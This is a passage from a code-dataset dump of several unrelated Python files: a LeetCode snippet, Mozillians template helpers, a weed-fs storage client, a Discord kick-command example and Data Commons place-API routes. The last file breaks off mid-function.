target))\n#\n#nums=[-3,4,3,90]\n#target=0\n#print(s.twoSum(nums, target))\n\n\nnums=[0,4,3,0]\ntarget=0\nprint(s.twoSum(nums, target))","sub_path":"exercise/leetcode/python_src/by2017_Sep/Leet001.py","file_name":"Leet001.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"7178227","text":"import re\nfrom datetime import date\n\nimport jinja2\nfrom jingo import register\n\n\nPARAGRAPH_RE = re.compile(r'(?:\\r\\n|\\r|\\n){2,}')\n\n\n@register.filter\ndef paragraphize(value):\n return jinja2.Markup(\n u'\\n\\n'.join(u'<p>%s</p>' % p.replace('\\n', '<br>\\n')\n for p in PARAGRAPH_RE.split(jinja2.escape(value))))\n\n\n@register.inclusion_tag('phonebook/includes/search_result.html')\n@jinja2.contextfunction\ndef search_result(context, profile):\n d = dict(context.items())\n d.update(profile=profile)\n return d\n\n\n@register.function\ndef get_mozillian_years(userprofile):\n if userprofile.date_mozillian:\n year_difference = date.today().year - userprofile.date_mozillian.year\n return year_difference\n return None\n","sub_path":"mozillians/phonebook/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"37290956","text":"# ** -- coding: utf-8 -- **\n#!/usr/bin/env python\n#\n#Copyright (c) 2011 darkdarkfruit <darkdarkfruit@gmail.com>\n#\n#Permission is hereby granted, free of charge, to any person obtaining a copy\n#of this software and associated documentation files (the \"Software\"), to deal\n#in the Software without restriction, including without limitation the rights\n#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n#copies of the Software, and to permit persons to whom the Software is\n#furnished to do so, subject to the following conditions:\n#\n#The above copyright notice and this permission notice shall be included in\n#all copies or substantial portions of the Software.\n#\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n#THE SOFTWARE.\n#\n\n\n\n'''\npython interface of weed-fs.\n(https://code.google.com/p/weed-fs/)\n\nnote:\n ensure weed master-server and at least one volume-server are up\n default:\n master-server: 127.0.0.1:9333\n volume-server: 127.0.0.1:8080\n\n\n'''\n\n\n__all__ = ['WeedMaster', 'WeedVolume']\n\n\nimport json\nimport random\nimport StringIO\nimport urlparse\nimport requests\nfrom conf import LOGGER\n\n\nclass WeedAssignKey(dict):\n ''' represent this json in dict and object:\n\n {\"count\":1,\"fid\":\"3,01637037d6\",\"url\":\"127.0.0.1:8080\",\"publicUrl\":\"localhost:8080\"}\n\n '''\n def __init__(self, json_of_weed_response=None):\n\n self['fid'] = ''\n self['count'] = 0\n self['url'] = ''\n self['publicUrl'] = ''\n\n if json_of_weed_response:\n try:\n d = json.loads(json_of_weed_response)\n self.update(d)\n except Exception as e:\n LOGGER.error('Error for json.loads \"%s\".\\nException: %s'\n % (json_of_weed_response, e))\n\n for k, v in self.items():\n setattr(self, k, v)\n super(WeedAssignKey, self).__init__()\n\n\n\nclass WeedAssignKeyExtended(WeedAssignKey):\n ''' extend weed-assign-key for adding these keys:\n\n 'full_url', 'full_public_url', 'fid_full_url', 'fid_full_publicUrl':\n\n represents:\n self['full_url'] = 'http://' + self['url']\n self['full_publicUrl'] = 'http://' + self['publicUrl']\n self['fid_full_url'] = self['full_url'] + '/' + self['fid']\n self['fid_full_publicUrl'] = self['full_publicUrl'] + '/' + self['fid']\n\n '''\n def __init__(self, json_of_weed_response=None):\n super(WeedAssignKeyExtended, self).__init__(json_of_weed_response)\n self['full_url'] = urlparse.urljoin('http://', self['url'])\n self['full_publicUrl'] = urlparse.urljoin('http://', self['publicUrl'])\n self['fid_full_url'] = urlparse.urljoin(self['full_url'], self['fid'])\n self['fid_full_publicUrl'] = urlparse.urljoin(self['full_publicUrl'], self['fid'])\n for k, v in self.items():\n setattr(self, k, v)\n\n\n def update_full_urls(self):\n ''' update \"full_url\" and \"full_publicUrl\" '''\n self['full_url'] = urlparse.urljoin('http://', self['url'])\n self['full_publicUrl'] = urlparse.urljoin('http://', self['publicUrl'])\n self['fid_full_url'] = urlparse.urljoin(self['full_url'], self['fid'])\n self['fid_full_publicUrl'] = urlparse.urljoin(self['full_publicUrl'], self['fid'])\n\n\n\nclass WeedMaster(object):\n \"\"\"\n Weed-FS's master server(relative to volume-server)\n \"\"\"\n\n def __init__(self, host='127.0.0.1', port=9333):\n \"\"\"\n\n Arguments:\n - `host`:\n - `port`:\n \"\"\"\n self.host = host\n self.port = port\n self.url_base = 'http://' + self.host + ':' + str(self.port)\n self.url_assign = self.url_base + '/dir/assign'\n self.url_lookup = self.url_base + '/dir/lookup'\n self.url_vacuum = self.url_base + '/vol/vacuum'\n self.url_status = self.url_base + '/dir/status'\n\n\n def acquire_assign_info(self):\n \"\"\"\n acquire an assign key from master-server.\n assign_key is in json format like below:\n -----------\n {\"count\":1,\"fid\":\"3,01637037d6\",\"url\":\"127.0.0.1:8080\",\"publicUrl\":\"localhost:8080\"}\n -----------\n\n Arguments:\n - `self`:\n \"\"\"\n result = None\n try:\n r = requests.get(self.url_assign)\n result = json.loads(r.content)\n except Exception as e:\n LOGGER.error('Could not get status of this volume: %s. Exception is: %s'\n % (self.url_status, e))\n result = None\n return result\n\n\n def acquire_new_assign_key(self, count=1):\n \"\"\"\n get a new avalable new volume-file-location from from weed-master by getting a new-assign-key\n Arguments:\n - `self`:\n\n assign_key is in json format like below:\n -----------\n {\"count\":1,\"fid\":\"3,01637037d6\",\"url\":\"127.0.0.1:8080\",\"publicUrl\":\"localhost:8080\"}\n -----------\n\n return a tuple(dst_file_fid, dst_volume_url) like below:\n ----------\n (dst_file_fid, http://{volume-url})\n (3,20392030920, http://127.0.0.1:8080)\n ----------\n\n \"\"\"\n assign_key_url = self.url_assign + '?count=' + str(count)\n dst_volume_url = None\n wak = WeedAssignKeyExtended()\n try:\n LOGGER.debug('Getting new dst_volume_url with master-assign-key-url: %s' % assign_key_url)\n r = requests.get(assign_key_url)\n key_dict = json.loads(r.content)\n\n wak.update(key_dict)\n wak.update_full_urls()\n\n LOGGER.info('Successfuly got dst_volume_url: %s' % dst_volume_url)\n except Exception as e:\n LOGGER.error('Could not get new assign key from the assign url: %s. Exception is: %s'\n % (assign_key_url, e))\n return wak\n\n\n\n def lookup(self, volume_id):\n \"\"\"\n lookup the urls of a volume\n return a json like below:\n -----------\n {\n \"locations\": [\n {\n \"publicUrl\": \"localhost:8080\",\n \"url\": \"localhost:8080\"\n }\n ]\n }\n -----------\n\n Arguments:\n - `self`:\n \"\"\"\n result = None\n try:\n r = requests.get(self.url_lookup + '?volumeId=%s' % volume_id)\n result = json.loads(r.content)\n except Exception as e:\n LOGGER.error('Could not get status of this volume: %s. Exception is: %s' % (self.url_status, e))\n result = None\n return result\n\n\n def vacuum(self):\n \"\"\"\n Force Garbage Collection\n\n If your system has many deletions, the deleted file's disk space will not be synchronously re-claimed. There is a background job to check volume disk usage. If empty space is more than the threshold, default to 0.3, the vacuum job will make the volume readonly, create a new volume with only existing files, and switch on the new volume. If you are impatient or doing some testing, vacuum the unused spaces this way.\n\n > curl \"http://localhost:9333/vol/vacuum\"\n > curl \"http://localhost:9333/vol/vacuum?garbageThreshold=0.4\"\n\n return a json of refreshed status like below:\n -----------\n {\n \"Topology\": {\n \"DataCenters\": [\n {\n \"Free\": 93,\n \"Max\": 100,\n \"Racks\": [\n {\n \"DataNodes\": [\n {\n \"Free\": 93,\n \"Max\": 100,\n \"PublicUrl\": \"127.0.0.1:8080\",\n \"Url\": \"127.0.0.1:8080\",\n \"Volumes\": 7\n }\n ],\n \"Free\": 93,\n \"Max\": 100\n }\n ]\n }\n ],\n \"Free\": 93,\n \"Max\": 100,\n \"layouts\": [\n {\n \"replication\": \"000\",\n \"writables\": [\n 2,\n 3,\n 5,\n 6,\n 7,\n 1,\n 4\n ]\n }\n ]\n },\n \"Version\": \"0.37\"\n }\n\n {\n \"locations\": [\n {\n \"publicUrl\": \"localhost:8080\",\n \"url\": \"localhost:8080\"\n }\n ]\n }\n -----------\n\n Arguments:\n - `self`:\n \"\"\"\n result = None\n try:\n r = requests.get(self.url_vacuum)\n result = json.loads(r.content)\n except Exception as e:\n LOGGER.error('Could not get status of this volume: %s. Exception is: %s' % (self.url_status, e))\n result = None\n return result\n\n\n def get_status(self):\n \"\"\"\n get status of this volume\n\n Arguments:\n - `self`:\n \"\"\"\n result = None\n try:\n r = requests.get(self.url_status)\n result = json.loads(r.content)\n except Exception as e:\n LOGGER.error('Could not get status of this volume: %s. Exception is: %s' % (self.url_status, e))\n result = None\n return result\n\n\n def __repr__(self):\n return '<WeedMaster: %s:%s>' % (self.host, self.port)\n\n\n\nclass WeedVolume(object):\n \"\"\"\n Weed-FS's volume server(relative to master-server)\n \"\"\"\n\n def __init__(self, host='127.0.0.1', port=8080):\n \"\"\"\n\n Arguments:\n - `host`:\n - `port`:\n \"\"\"\n self.host = host\n self.port = port\n self.url_base = 'http://' + self.host + ':' + str(self.port)\n self.url_status = self.url_base + '/status'\n\n\n def get_status(self):\n \"\"\"\n get status of this volume\n\n Arguments:\n - `self`:\n \"\"\"\n r = requests.get(self.url_status)\n try:\n result = json.loads(r.content)\n except Exception as e:\n LOGGER.error('Could not get status of this volume: %s. Exception is: %s' % (self.url_status, e))\n result = None\n return result\n\n\n def __repr__(self):\n return '<WeedVolume: %s:%s>' % (self.host, self.port)\n\n\n\n\nclass WeedOperation(object):\n \"\"\"\n do CRUD operations to weed-fs.\n Currently, implement it with /* tornado and */ requests. Maybe mongrel2 + brubeck is better?\n\n \"\"\"\n\n def __init__(self, master_host='127.0.0.1', master_port='9333'):\n self.master = WeedMaster(master_host, master_port)\n\n\n def get_fid_full_url(self, fid):\n \"\"\"\n get operatable full_url by fid.\n lookup info returns:\n -----------\n {\n \"locations\": [\n {\n \"publicUrl\": \"localhost:8080\",\n \"url\": \"localhost:8080\"\n }\n ]\n }\n -----------\n\n return something like: 'http://127.0.0.1:8080/3,0230203913'\n \"\"\"\n result = None\n volume_id = fid.split(',')[0]\n full_url = ''\n try:\n r = self.master.lookup(volume_id)\n # _url = WEEDFS_MASTER_URL + '/dir/lookup?volumeId=%s' % volume_id\n # LOGGER.debug('lookup volume by url: %s' % _url)\n # r = requests.get(_url)\n result = json.loads(r.content)\n locations = result['locations']\n\n # choose a random location\n location = locations[random.randint(0, len(locations) - 1)]\n full_url = 'http://%s/%s' % (location['url'], fid)\n except Exception as e:\n LOGGER.error('Could not get volume location of this fid: %s. Exception is: %s' % (fid, e))\n result = None\n return full_url\n\n\n @staticmethod\n def save_file_to_weed(self, fp, fid_full_url, fname=''):\n \"\"\"\n save fp(file-pointer, file-description) to remote weed\n \"\"\"\n tmp_uploading_file_name = fname or 'a.unknown'\n rsp = requests.post(fid_full_url, files={'file' : (tmp_uploading_file_name, fp)})\n # LOGGER.debug(rsp.request.headers)\n if not rsp.json().has_key('size'): # post new file fails\n err_msg = 'Could not save file on weed-fs with fid_full_url: %s' % (fid_full_url)\n LOGGER.error(err_msg)\n return (False, err_msg)\n data = {\n 'fid_full_url' : fid_full_url,\n 'fname' : fname,\n 'storage_size' : rsp.json().get('size', 0),\n }\n return (True, data)\n\n\n ## -----------------------------------------------------------\n ## weedfs operation: CRUD starts\n ## -----------------------------------------------------------\n def create(self, fp, fname=''):\n \"\"\"\n create a file in weed-fs with @fid\n \"\"\"\n fid_full_url = 'wrong_url'\n try:\n wak = self.master.acquire_new_assign_key()\n LOGGER.debug('Creating file: fp: %s, fname: %s, fid_full_url: %s'\n % (fp, fname, fid_full_url))\n return WeedOperation.save_file_to_weed(fp, wak.fid_full_url, fname)\n except Exception as e:\n err_msg = 'Could not create file: fp: %s, fname: %s, fid_full_url: %s, e: %s' % (fp, fname, fid_full_url, e)\n LOGGER.error(err_msg)\n return None\n\n\n def read(self, fid, fname='', just_url=True):\n \"\"\"\n read/get a file from weed-fs with @fid.\n\n @just_url:\n True -> just return fid_full_url (web-servers/browsers like nginx, chrome can get resource by this url)\n False -> return a http response of requests(package requests).\n \"\"\"\n fid_full_url = 'wrong_url'\n try:\n fid_full_url = self.get_fid_full_url(fid)\n LOGGER.debug('Reading file(just_url:%s): fid: %s, fname: %s, fid_full_url: %s' % (just_url, fid, fname, fid_full_url))\n if just_url:\n return fid_full_url\n else:\n rsp = requests.get(fid_full_url)\n return rsp\n except Exception as e:\n err_msg = 'Could not read file(just_url:%s): fid: %s, fname: %s, fid_full_url: %s, e: %s' % (just_url, fid, fname, fid_full_url, e)\n LOGGER.error(err_msg)\n return None\n\n\n def update(self, fp, fid, fname=''):\n \"\"\"\n update a file in weed-fs with @fid\n \"\"\"\n fid_full_url = 'wrong_url'\n try:\n fid_full_url = self.get_fid_full_url(fid)\n LOGGER.debug('Updating file: fp: %s, fname: %s, fid_full_url: %s' % (fp, fname, fid_full_url))\n return WeedOperation.save_file_to_weed(fp, fid_full_url, fname)\n except Exception as e:\n err_msg = 'Could not Updating file: fp: %s, fname: %s, fid_full_url: %s, e: %s' % (fp, fname, fid_full_url, e)\n LOGGER.error(err_msg)\n return None\n\n\n def delete(self, fid, fname=''):\n \"\"\"\n delete a file in weed-fs with @fid\n \"\"\"\n fid_full_url = 'wrong_url'\n try:\n fid_full_url = self.get_fid_full_url(fid)\n LOGGER.debug('Deleting file: fid: %s, fname: %s, fid_full_url: %s' % (fid, fname, fid_full_url))\n\n r = requests.delete(fid_full_url)\n if r.json().has_key('size'):\n return True\n except Exception as e:\n err_msg = 'Deleting file: fid: %s, fname: %s, fid_full_url: %s, e: %s' % (fid, fname, fid_full_url, e)\n LOGGER.error(err_msg)\n return False\n return False\n ## -----------------------------------------------------------\n ## weedfs operation: CRUD ends\n ## -----------------------------------------------------------\n\n\n def create_multiple(self, fp_array):\n ''' create/save multiple files '''\n # try:\n # wak = self.master.acquire_new_assign_key(count)\n # waks.append(wak)\n # fnames.append(fname)\n # for i in range(count - 1):\n # _w = {}\n # _w.update(wak)\n # seq = '_%d' % (i + 1)\n # _w.update({'fid' : wak.fid + seq})\n # _w.update_full_urls()\n # waks.append(_w)\n # fname.append(fname + seq)\n\n # for (i, w) in sequence(waks):\n # return WeedOperation.save_file_to_weed(fp, waks[i], fnames[i])\n\n pass\n\n\n def update_by_fid(self, dst_fid, src_fid, src_fname=''):\n \"\"\"\n replace file@dst_fid with file@src_fid\n \"\"\"\n try:\n src_file_rsp = self.read(src_fid, fname=src_fname, just_url=False)\n fp = StringIO.StringIO(src_file_rsp.content)\n LOGGER.debug('Updating file: dst_fid: %s, src_fid: %s, src_fname: %s, fp: %s' % (dst_fid, src_fid, src_fname, fp))\n return self.update(fp, dst_fid, src_fname)\n except Exception as e:\n err_msg = 'Could not Updating file: dst_fid: %s, src_fid: %s, src_fname: %s. e: %s' % (dst_fid, src_fid, src_fname, e)\n LOGGER.error(err_msg)\n return None\n\n\n\n","sub_path":"weed/weed_deprecated.py","file_name":"weed_deprecated.py","file_ext":"py","file_size_in_byte":17511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"444996392","text":"import discord\nfrom discord.ext import commands\n\nbot = commands.Bot(command_prefix=\"!\")\n\n@bot.event\nasync def on_ready(): # Creates an event that is called when the bot is connected to discord\n print(\"I am ready\")\n\n@commands.has_permissions(kick_members=True) #only allow to use command if you have kick members permission\n@bot.command()\nasync def kick(ctx, user: discord.Member, *, reason=\"No reason provided\"):\n embed = discord.Embed(title=f\":boot: Kicked {user.name}!\", description=f\"Reason: {reason}\\nBy: {ctx.author.mention}\") #create a kick embed\n await ctx.message.delete()\n await ctx.send(embed=embed)# send the embed in the channel\n await user.send(embed=embed) #send embed for the user\n await user.kick(reason=reason) #kick the user with specified reason\n \nbot.run(\"token\") #run the bot","sub_path":"examples/example_kick.py","file_name":"example_kick.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"84443486","text":"# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport collections\nimport json\nimport re\n\nfrom flask import Blueprint, request, Response, url_for, g\nfrom flask_babel import gettext\n\nfrom cache import cache\nimport services.datacommons as dc\nfrom services.datacommons import fetch_data\nfrom routes.api.shared import cached_name\nimport routes.api.stats as stats_api\nimport lib.i18n as i18n\n\nCHILD_PLACE_LIMIT = 50\n\n# Place types to keep for list of child places, keyed by parent place type.\nWANTED_PLACE_TYPES = {\n 'Country': [\n \"State\", \"EurostatNUTS1\", \"EurostatNUTS2\", \"AdministrativeArea1\"\n ],\n 'State': [\"County\"],\n 'County': [\"City\", \"Town\", \"Village\", \"Borough\"],\n}\nALL_WANTED_PLACE_TYPES = [\n \"Country\", \"State\", \"County\", \"City\", \"Town\", \"Village\", \"Borough\",\n \"CensusZipCodeTabulationArea\", \"EurostatNUTS1\", \"EurostatNUTS2\",\n \"EurostatNUTS3\", \"AdministrativeArea1\", \"AdministrativeArea2\",\n \"AdministrativeArea3\", \"AdministrativeArea4\", \"AdministrativeArea5\"\n]\n\n# These place types are equivalent: prefer the key.\nEQUIVALENT_PLACE_TYPES = {\n \"State\": \"AdministrativeArea1\",\n \"County\": \"AdministrativeArea2\",\n \"City\": \"AdministrativeArea3\",\n \"Town\": \"City\",\n \"Borough\": \"City\",\n \"Village\": \"City\",\n}\n\nSTATE_EQUIVALENTS = {\"State\", \"AdministrativeArea1\"}\nUS_ISO_CODE_PREFIX = 'US'\nENGLISH_LANG = 'en'\n\n# Define blueprint\nbp = Blueprint(\"api.place\", __name__, url_prefix='/api/place')\n\n\n@cache.memoize(timeout=3600 * 24) # Cache for one day.\ndef get_property_value(dcid, prop, out=True):\n return dc.get_property_values([dcid], prop, out)[dcid]\n\n\n@bp.route('/type/<path:place_dcid>')\n@cache.memoize(timeout=3600 * 24) # Cache for one day.\ndef get_place_type(place_dcid):\n place_types = get_property_value(place_dcid, 'typeOf')\n # We prefer to use specific type like \"State\", \"County\" over\n # \"AdministrativeArea\"\n chosen_type = None\n for place_type in place_types:\n if not chosen_type or chosen_type.startswith('AdministrativeArea') \\\n or chosen_type == 'Place':\n chosen_type = place_type\n return chosen_type\n\n\ndef get_name(dcids):\n \"\"\"Returns display names for set of dcids.\n\n Args:\n dcids: A list of place dcids.\n\n Returns:\n A dictionary of display place names, keyed by dcid.\n \"\"\"\n return cached_name('^'.join((sorted(dcids))))\n\n\n@bp.route('/name')\ndef api_name():\n \"\"\"Get place names.\"\"\"\n dcids = request.args.getlist('dcid')\n result = get_name(dcids)\n return Response(json.dumps(result), 200, mimetype='application/json')\n\n\n@cache.memoize(timeout=3600 * 24) # Cache for one day.\ndef cached_i18n_name(dcids, locale, should_resolve_all):\n \"\"\"Returns localization names for set of dcids.\n\n Args:\n dcids: ^ separated string of dcids. It must be a single string for the cache.\n locale: the desired localization language code.\n should_resolve_all: True if every dcid should be returned with a\n name, False if only i18n names should be filled\n\n Returns:\n A dictionary of place names, keyed by dcid (potentially sparse if should_resolve_all=False)\n \"\"\"\n dcids = dcids.split('^')\n response = fetch_data('/node/property-values', {\n 'dcids': dcids,\n 'property': 'nameWithLanguage',\n 'direction': 'out'\n },\n compress=False,\n post=True)\n result = {}\n dcids_default_name = []\n locales = i18n.locale_choices(locale)\n for dcid in dcids:\n values = response[dcid].get('out')\n # If there is no nameWithLanguage for this dcid, fall back to name.\n if not values:\n dcids_default_name.append(dcid)\n continue\n result[dcid] = ''\n for locale in locales:\n for entry in values:\n if has_locale_name(entry, locale):\n result[dcid] = extract_locale_name(entry, locale)\n break\n if result[dcid]:\n break\n if dcids_default_name:\n if should_resolve_all:\n default_names = cached_name('^'.join(sorted(dcids_default_name)))\n else:\n default_names = {}\n for dcid in dcids_default_name:\n result[dcid] = default_names.get(dcid, '')\n return result\n\n\ndef has_locale_name(entry, locale):\n return entry['value'].endswith('@' + locale.lower())\n\n\ndef extract_locale_name(entry, locale):\n if entry['value'].endswith('@' + locale.lower()):\n locale_index = len(entry['value']) - len(locale) - 1\n return entry['value'][:locale_index]\n else:\n return ''\n\n\ndef get_i18n_name(dcids, should_resolve_all=True):\n \"\"\"\"Returns localization names for set of dcids.\n\n Args:\n dcids: A list of place dcids.\n should_resolve_all: True if every dcid should be returned with a\n name, False if only i18n names should be filled\n\n Returns:\n A dictionary of place names, keyed by dcid (potentially sparse if should_resolve_all=False)\n \"\"\"\n return cached_i18n_name('^'.join((sorted(dcids))), g.locale,\n should_resolve_all)\n\n\n@bp.route('/name/i18n')\ndef api_i18n_name():\n \"\"\"Get place i18n names.\"\"\"\n dcids = request.args.getlist('dcid')\n result = get_i18n_name(dcids)\n return Response(json.dumps(result), 200, mimetype='application/json')\n\n\n@bp.route('/statsvars/<path:dcid>')\n@cache.memoize(timeout=3600 * 24) # Cache for one day.\ndef statsvars_route(dcid):\n \"\"\"Get all the statistical variables that exist for a give place.\n Args:\n dcid: Place dcid.\n Returns:\n A list of statistical variable dcids.\n \"\"\"\n return Response(json.dumps(statsvars(dcid)),\n 200,\n mimetype='application/json')\n\n\n@cache.memoize(timeout=3600 * 24) # Cache for one day.\ndef statsvars(dcid):\n \"\"\"\n Get all the statistical variable dcids for a place.\n \"\"\"\n response = fetch_data('/place/stats-var', {\n 'dcids': [dcid],\n },\n compress=False,\n post=False,\n has_payload=False)\n return response['places'][dcid].get('statsVars', [])\n\n\n@cache.memoize(timeout=3600 * 24) # Cache for one day.\ndef get_stat_vars_union(places, stat_vars):\n \"\"\"Get all the statistical variable dcids for some places.\n\n Args:\n places: Place DCIDs separated by \"^\" as a single string.\n stat_vars: list of stat var dcids.\n\n Returns:\n List of unique statistical variable dcids each as a string.\n \"\"\"\n places = places.split(\"^\")\n # The two indexings are due to how protobuf fields are converted to json\n return fetch_data('/v1/place/stat-vars/union', {\n 'dcids': places,\n 'statVars': stat_vars,\n },\n compress=False,\n post=True,\n has_payload=False).get('statVars', [])\n\n\n@bp.route('/stat-vars/union', methods=['POST'])\ndef get_stat_vars_union_route():\n \"\"\"Get all the statistical variables that exist for some places.\n\n Returns:\n List of unique statistical variable dcids each as a string.\n \"\"\"\n dcids = sorted(request.json.get('dcids', []))\n stat_vars = (request.json.get('statVars', []))\n\n return Response(json.dumps(get_stat_vars_union(\"^\".join(dcids), stat_vars)),\n 200,\n mimetype='application/json')\n\n\n@bp.route('/child/<path:dcid>')\n@cache.memoize(timeout=3600 * 24) # Cache for one day.\ndef child(dcid):\n \"\"\"\n Get top child places for a place.\n \"\"\"\n child_places = child_fetch(dcid)\n for place_type in child_places:\n child_places[place_type].sort(key=lambda x: x['pop'], reverse=True)\n child_places[place_type] = child_places[place_type][:CHILD_PLACE_LIMIT]\n return Response(json.dumps(child_places), 200, mimetype='application/json')\n\n\n# TODO(hanlu): get nameWithLanguage instead of using name.\n@cache.memoize(timeout=3600 * 24) # Cache for one day.\ndef child_fetch(dcid):\n contained_response = fetch_data('/node/property-values', {\n 'dcids': [dcid],\n 'property': 'containedInPlace',\n 'direction': 'in'\n },\n compress=False,\n post=True)\n places = contained_response[dcid].get('in', [])\n\n overlaps_response = fetch_data('/node/property-values', {\n 'dcids': [dcid],\n 'property': 'geoOverlaps',\n 'direction': 'in'\n },\n compress=False,\n post=True)\n places = places + overlaps_response[dcid].get('in', [])\n\n dcid_str = '^'.join(sorted(map(lambda x: x['dcid'], places)))\n pop = stats_api.get_stats_latest(dcid_str, 'Count_Person')\n\n place_type = get_place_type(dcid)\n wanted_types = WANTED_PLACE_TYPES.get(place_type, ALL_WANTED_PLACE_TYPES)\n result = collections.defaultdict(list)\n for place in places:\n for place_type in place['types']:\n place_pop = pop.get(place['dcid'], 0)\n # TODO(beets): Remove this when we push resolved places to prod.\n if place['dcid'].startswith('geoNames'):\n continue\n if place_type in wanted_types and place_pop > 0:\n result[place_type].append({\n 'name': place.get('name', place['dcid']),\n 'dcid': place['dcid'],\n 'pop': place_pop,\n })\n\n # Filter equivalent place types - if a child place occurs in multiple groups, keep it in the preferred group type.\n for (preferred, equivalent) in EQUIVALENT_PLACE_TYPES.items():\n if preferred in result and equivalent in result:\n for preferred_place in result[preferred]:\n for i, equivalent_place in enumerate(result[equivalent]):\n if preferred_place['dcid'] == equivalent_place['dcid']:\n del result[equivalent][i]\n break\n\n # Drop empty categories\n result = dict(filter(lambda x: len(x) > 0, result.items()))\n return result\n\n\n@bp.route('/parent/<path:dcid>')\ndef api_parent_places(dcid):\n result = parent_places(dcid)[dcid]\n return Response(json.dumps(result), 200, mimetype='application/json')\n\n\n@cache.memoize(timeout=3600 * 24) # Cache for one day.\ndef parent_places(dcids):\n \"\"\" Get the parent place chain for a list of places.\n\n Args:\n dcids: ^ separated string of dcids. It must be a single string for the cache.\n\n Returns:\n A dictionary of lists of parent places, keyed by dcid.\n \"\"\"\n # In DataCommons knowledge graph, places has multiple containedInPlace\n # relation with parent places, but it might not be comprehensive. For\n # example, \"Mountain View\" is containedInPlace for \"Santa Clara County\" and\n # \"California\" but not \"United States\":\n # https://datacommons.org/browser/geoId/0649670\n # Here calling get_parent_place twice to get to the top parents.\n if not dcids:\n return {}\n\n result = {}\n parents1 = get_parent_place(dcids)\n dcids = dcids.split('^')\n dcid_parents1_mapping = {}\n for dcid in dcids:\n first_parents = parents1[dcid]\n result[dcid] = first_parents\n if first_parents:\n dcid_parents1_mapping[dcid] = first_parents[-1]['dcid']\n if not dcid_parents1_mapping:\n return result\n\n parents2 = get_parent_place('^'.join(dcid_parents1_mapping.values()))\n dcid_parents2_mapping = {}\n for dcid in dcid_parents1_mapping.keys():\n second_parents = parents2[dcid_parents1_mapping[dcid]]\n result[dcid].extend(second_parents)\n if second_parents:\n dcid_parents2_mapping[dcid] = second_parents[-1]['dcid']\n if not dcid_parents2_mapping:\n return result\n\n parents3 = get_parent_place('^'.join(dcid_parents2_mapping.values()))\n for dcid in dcid_parents2_mapping.keys():\n result[dcid].extend(parents3[dcid_parents2_mapping[dcid]])\n result[dcid] = [x for x in result[dcid] if x['dcid'] != 'Earth']\n return result\n\n\n@cache.memoize(timeout=3600 * 24) # Cache for one day.\ndef get_parent_place(dcids):\n \"\"\" Get containedInPlace for each place in a list of places\n\n Args:\n dcids: ^ separated string of dcids. It must be a single string for the cache.\n\n Returns:\n A dictionary of lists of containedInPlace, keyed by dcid.\n \"\"\"\n if dcids:\n dcids = dcids.split('^')\n else:\n dcids = []\n response = fetch_data('/node/property-values', {\n 'dcids': dcids,\n 'property': 'containedInPlace',\n 'direction': 'out'\n },\n compress=False,\n post=True)\n result = {}\n for dcid in dcids:\n parents = response[dcid].get('out', [])\n parents.sort(key=lambda x: x['dcid'], reverse=True)\n for i in range(len(parents)):\n if len(parents[i]['types']) > 1:\n parents[i]['types'] = [\n x for x in parents[i]['types']\n if not x.startswith('AdministrativeArea')\n ]\n result[dcid] = parents\n return result\n\n\n@cache.memoize(timeout=3600 * 24) # Cache for one day.\n@bp.route('/mapinfo/<path:dcid>')\ndef api_mapinfo(dcid):\n \"\"\"\n TODO(wsws/boxu): This function only works for the US, which doesn't have\n the issue of crossing +-180 longitude and +-90 latitude. If using this\n function for places with those complicated situations, need to adjust this\n function accordingly.\n \"\"\"\n left = 180\n right = -180\n up = -90\n down = 90\n coordinate_sequence_set = []\n kmlCoordinates = get_property_value(dcid, 'kmlCoordinates')\n if not kmlCoordinates:\n return {}\n\n coordinate_groups = kmlCoordinates[0].split('</coordinates><coordinates>')\n for coordinate_group in coordinate_groups:\n coordinates = coordinate_group.replace('<coordinates>', '').replace(\n '</coordinates>', '').split(' ')\n coordinate_sequence = []\n for coordinate in coordinates:\n v = coordinate.split(',')\n x = float(v[0])\n y = float(v[1])\n left = min(left, x)\n right = max(right, x)\n down = min(down, y)\n up = max(up, y)\n coordinate_sequence.append({'lat': y, 'lng': x})\n coordinate_sequence_set.append(coordinate_sequence)\n\n x_spread = right - left\n y_spread = up - down\n margin = 0.02\n\n result = {\n 'left': left - margin * x_spread,\n 'right': right + margin * x_spread,\n 'up': up + margin * y_spread,\n 'down': down - margin * y_spread,\n 'coordinateSequenceSet': coordinate_sequence_set\n }\n return Response(json.dumps(result), 200, mimetype='application/json')\n\n\n@cache.memoize(timeout=3600 * 24) # Cache for one day.\ndef get_related_place(dcid,\n stats_vars_string,\n within_place=None,\n is_per_capita=None):\n stats_vars = stats_vars_string.split('^')\n\n return dc.get_related_place(dcid,\n stats_vars,\n within_place=within_place,\n is_per_capita=is_per_capita)\n\n\ndef get_ranking_url(containing_dcid,\n place_type,\n stat_var,\n highlight_dcid,\n is_per_capita=False):\n url = url_for(\n 'ranking.ranking',\n stat_var=stat_var,\n place_type=place_type,\n place_dcid=containing_dcid,\n h=highlight_dcid,\n )\n if is_per_capita:\n url = url + \"&pc\"\n 